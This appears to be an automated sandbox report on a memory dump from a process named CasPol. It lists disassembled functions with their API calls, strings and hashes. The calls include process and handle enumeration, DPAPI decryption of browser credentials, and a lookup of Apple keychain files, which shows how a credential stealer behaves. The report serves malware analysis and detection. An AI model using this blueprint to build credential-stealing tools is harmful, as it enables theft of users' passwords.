39240 44457f 39239->39240 39240->39263 39426 432d4e 39240->39426 39243 444316 18 API calls 39244 4445b0 39243->39244 39430 41eed2 39244->39430 39246 4445cf 39247 4445d6 39246->39247 39248 4445ee 39246->39248 39447 416935 16 API calls 39247->39447 39448 43302c memset 39248->39448 39251 4445fa 39449 43302c memset 39251->39449 39253 444609 39253->39263 39450 416935 16 API calls 39253->39450 39255 444646 39451 434d4b 17 API calls 39255->39451 39257 44464d 39452 437655 16 API calls 39257->39452 39259 444653 39453 4442e6 11 API calls 39259->39453 39261 44465d 39261->39263 39454 416935 16 API calls 39261->39454 39455 4442e6 11 API calls 39263->39455 39494 438460 39264->39494 39266 40b8a4 39266->38654 39270 4251c4 39266->39270 39268 409a74 GetTempFileNameW 39267->39268 39269 409a66 GetWindowsDirectoryW 39267->39269 39268->38640 39269->39268 39591 424f07 11 API calls 39270->39591 39272 4251e4 39273 4251f7 39272->39273 39274 4251e8 39272->39274 39593 4250f8 39273->39593 39592 4446ea 11 API calls 39274->39592 39276 4251f2 39276->38678 39278 425209 39281 425249 39278->39281 39284 4250f8 127 API calls 39278->39284 39285 425287 39278->39285 39601 4384e9 135 API calls 39278->39601 39602 424f74 124 API calls 39278->39602 39281->39285 39603 424ff0 13 API calls 39281->39603 39284->39278 39605 415c7d 16 API calls 39285->39605 39286 425266 39286->39285 39604 415be9 memcpy 39286->39604 39288->38678 39289->38678 39290->38678 39291->38678 39292->38678 39293->38678 39294->38678 39295->38678 39296->38678 39297->38654 39298->38645 39299->38675 39332 4096c3 CreateFileW 39300->39332 39302 40cc34 39303 40cc3d GetFileSize 39302->39303 39311 40bbca 39302->39311 39304 40afcf 2 API calls 39303->39304 39305 40cc64 39304->39305 39333 40a2ef ReadFile 39305->39333 39307 40cc71 39334 40ab4a MultiByteToWideChar 39307->39334 39309 40cc95 CloseHandle 39310 40b04b ??3@YAXPAX 39309->39310 39310->39311 39311->39188 39312 40cf04 39311->39312 39313 40b633 free 39312->39313 39314 40cf14 39313->39314 39340 
40b1ab free free 39314->39340 39316 40bbdd 39316->39188 39316->39193 39317 40cf1b 39317->39316 39319 40cfef 39317->39319 39341 40cd4b 39317->39341 39320 40cd4b 14 API calls 39319->39320 39320->39316 39322 40b633 free 39321->39322 39323 40cc15 39322->39323 39324 40aa04 free 39323->39324 39325 40cc1d 39324->39325 39390 40b1ab free free 39325->39390 39327 40b7d4 memset CreateFileW 39327->38634 39327->38635 39328->39196 39329->39198 39330->39206 39331->39209 39332->39302 39333->39307 39335 40ab93 39334->39335 39336 40ab6b 39334->39336 39335->39309 39337 40a9ce 4 API calls 39336->39337 39338 40ab74 39337->39338 39339 40ab7c MultiByteToWideChar 39338->39339 39339->39335 39340->39317 39342 40cd7b 39341->39342 39375 40aa29 39342->39375 39344 40cef5 39345 40aa04 free 39344->39345 39346 40cefd 39345->39346 39346->39317 39348 40aa29 6 API calls 39349 40ce1d 39348->39349 39350 40aa29 6 API calls 39349->39350 39351 40ce3e 39350->39351 39352 40ce6a 39351->39352 39383 40abb7 wcslen memmove 39351->39383 39353 40ce9f 39352->39353 39386 40abb7 wcslen memmove 39352->39386 39355 40a8d0 7 API calls 39353->39355 39358 40ceb5 39355->39358 39356 40ce56 39384 40aa71 wcslen 39356->39384 39364 40a8d0 7 API calls 39358->39364 39360 40ce8b 39387 40aa71 wcslen 39360->39387 39361 40ce5e 39385 40abb7 wcslen memmove 39361->39385 39366 40cecb 39364->39366 39365 40ce93 39388 40abb7 wcslen memmove 39365->39388 39389 40d00b malloc memcpy free free 39366->39389 39369 40cedd 39370 40aa04 free 39369->39370 39371 40cee5 39370->39371 39372 40aa04 free 39371->39372 39373 40ceed 39372->39373 39374 40aa04 free 39373->39374 39374->39344 39376 40aa33 39375->39376 39377 40aa63 39375->39377 39378 40aa44 39376->39378 39379 40aa38 wcslen 39376->39379 39377->39344 39377->39348 39380 40a9ce malloc memcpy free free 39378->39380 39379->39378 39381 40aa4d 39380->39381 39381->39377 39382 40aa51 memcpy 39381->39382 39382->39377 39383->39356 39384->39361 39385->39352 39386->39360 39387->39365 39388->39353 39389->39369 

Control-flow Graph

APIs
• memset.MSVCRT ref: 0040DDAD
  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
• CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040DDD4
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
  • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation,?,000000FF,00000000,00000104), ref: 00413559
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver,?,000000FF,00000000,00000104), ref: 0041356B
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver,?,000000FF,00000000,00000104), ref: 0041357D
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject,?,000000FF,00000000,00000104), ref: 0041358F
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject,?,000000FF,00000000,00000104), ref: 004135A1
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject,?,000000FF,00000000,00000104), ref: 004135B3
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess,?,000000FF,00000000,00000104), ref: 004135C5
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess,?,000000FF,00000000,00000104), ref: 004135D7
• NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
• CloseHandle.KERNELBASE(C0000004), ref: 0040DE3E
• GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
• _wcsicmp.MSVCRT ref: 0040DEB2
• _wcsicmp.MSVCRT ref: 0040DEC5
• _wcsicmp.MSVCRT ref: 0040DED8
• OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
• GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
• DuplicateHandle.KERNEL32(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
• memset.MSVCRT ref: 0040DF5F
• CloseHandle.KERNEL32(C0000004), ref: 0040DF92
• _wcsicmp.MSVCRT ref: 0040DFB2
• CloseHandle.KERNEL32(00000104), ref: 0040DFF2
Strings
Memory Dump Source
• Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
• String ID: dllhost.exe$taskhost.exe$taskhostex.exe
• API String ID: 708747863-3398334509
• Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
• Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
• Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
• Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                                                                                                                                                  • memset.MSVCRT ref: 00413D7F
                                                                                                                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                                                                                  • memset.MSVCRT ref: 00413E07
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                                                                                                  • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,00000104,00000000,?), ref: 00413E77
                                                                                                                                                                                  • CloseHandle.KERNELBASE(?), ref: 00413EA8
                                                                                                                                                                                  • free.MSVCRT ref: 00413EC1
                                                                                                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00413F1A
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Handle$CloseProcessProcess32freememset$AddressCreateFirstFullImageModuleNameNextOpenProcQuerySnapshotToolhelp32
                                                                                                                                                                                  • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                                                  • API String ID: 3536422406-1740548384
                                                                                                                                                                                  • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                                                                                                  • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                                                                                  • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                                                                                                  • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                                                                                                  • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                                                                                  • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                                                                                  • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                                                                                  • String ID: BIN
                                                                                                                                                                                  • API String ID: 1668488027-1015027815
                                                                                                                                                                                  • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                                  • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                    • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                    • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                                                                                                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                  • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                                                                                  • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                                                                                  • free.MSVCRT ref: 00418803
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1355100292-0
                                                                                                                                                                                  • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                                                                                  • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404453
                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 767404330-0
                                                                                                                                                                                  • Opcode ID: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                                                                                                                                                                  • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                                                                                                                                                                  • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                                                                                  • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileFind$FirstNext
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1690352074-0
                                                                                                                                                                                  • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                  • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                                                                                  • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0041898C
                                                                                                                                                                                  • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InfoSystemmemset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3558857096-0
                                                                                                                                                                                  • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                  • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                                                                                  • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                  • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 004455C2
                                                                                                                                                                                  • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                  • memset.MSVCRT ref: 0044570D
                                                                                                                                                                                  • memset.MSVCRT ref: 00445725
                                                                                                                                                                                    • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                    • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                    • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                    • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                                                    • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                    • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                                                    • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000,000000F1,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 0041362A
                                                                                                                                                                                  • memset.MSVCRT ref: 0044573D
                                                                                                                                                                                  • memset.MSVCRT ref: 00445755
                                                                                                                                                                                  • memset.MSVCRT ref: 004458CB
                                                                                                                                                                                  • memset.MSVCRT ref: 004458E3
                                                                                                                                                                                  • memset.MSVCRT ref: 0044596E
                                                                                                                                                                                  • memset.MSVCRT ref: 00445A10
                                                                                                                                                                                  • memset.MSVCRT ref: 00445A28
                                                                                                                                                                                  • memset.MSVCRT ref: 00445AC6
                                                                                                                                                                                    • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                    • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                    • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                                                                    • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                                                                                    • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                                    • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                                                                                                                                  • memset.MSVCRT ref: 00445B52
                                                                                                                                                                                  • memset.MSVCRT ref: 00445B6A
                                                                                                                                                                                  • memset.MSVCRT ref: 00445C9B
                                                                                                                                                                                  • memset.MSVCRT ref: 00445CB3
                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                                                                                  • memset.MSVCRT ref: 00445B82
                                                                                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                    • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                    • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B80C
                                                                                                                                                                                    • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                                                                                    • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                                                                                  • memset.MSVCRT ref: 00445986
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                                                                                                  • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                                                                  • API String ID: 4101496090-3798722523
                                                                                                                                                                                  • Opcode ID: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                                                                                                                                                  • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                                                                                  • Opcode Fuzzy Hash: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                                                                                                                                                  • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                                    • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                    • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                                    • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                  • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                                                                                                  • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                                                                                  • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                                                  • API String ID: 2744995895-28296030
                                                                                                                                                                                  • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                                  • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                                                                                  • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                                  • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                    • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                                                                                    • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                                                                                  • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                  • memset.MSVCRT ref: 0040B756
                                                                                                                                                                                  • memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                  • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B80C
                                                                                                                                                                                  • CopyFileW.KERNEL32(00445FAE,?,00000000), ref: 0040B82D
                                                                                                                                                                                  • CloseHandle.KERNELBASE(00000000), ref: 0040B838
                                                                                                                                                                                  • memset.MSVCRT ref: 0040B851
                                                                                                                                                                                  • memset.MSVCRT ref: 0040B8CA
                                                                                                                                                                                  • memcmp.MSVCRT ref: 0040B9BF
                                                                                                                                                                                    • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404453
                                                                                                                                                                                    • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                    • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                                                                                                                  • memset.MSVCRT ref: 0040BB53
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                                                                                                  • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateCryptDataDeleteHandleLibraryLocalProcUnprotectmemcmpmemcpywcscpy
                                                                                                                                                                                  • String ID: chp$v10
                                                                                                                                                                                  • API String ID: 1297422669-2783969131
                                                                                                                                                                                  • Opcode ID: 0f77db0472bd63cf26258024439ab2a975461d6804070ba6b678b1f2ee2b0392
                                                                                                                                                                                  • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0f77db0472bd63cf26258024439ab2a975461d6804070ba6b678b1f2ee2b0392
                                                                                                                                                                                  • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                    • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040DDD4
                                                                                                                                                                                    • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                    • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004), ref: 0040DE3E
